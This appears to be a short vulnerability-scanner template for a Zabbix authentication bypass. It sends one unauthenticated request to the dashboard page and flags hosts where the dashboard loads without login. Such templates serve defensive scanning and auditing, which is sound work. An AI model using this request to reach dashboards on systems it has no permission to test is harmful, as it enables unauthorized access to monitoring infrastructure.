id: zabbix-authentication-bypass

info:
    name: Zabbix authentication Bypass
    author: FiveAourThe(https://github.com/FiveAourThe)
    severity: high
    verified: true

rules:
    r0:
        request:
            method: GET
            path: /zabbix.php?action=dashboard.view&dashboardid=1
        expression: response.status == 200 && response.body.bcontains(bytes("<a class=\"top-nav-zbbshare\" target=\"_blank\" title=\"Zabbix Share\" href=\"https://share.zabbix.com/\">Share</a>")) && response.body.bcontains(b"<title>Dashboard</title>")
expression: r0()
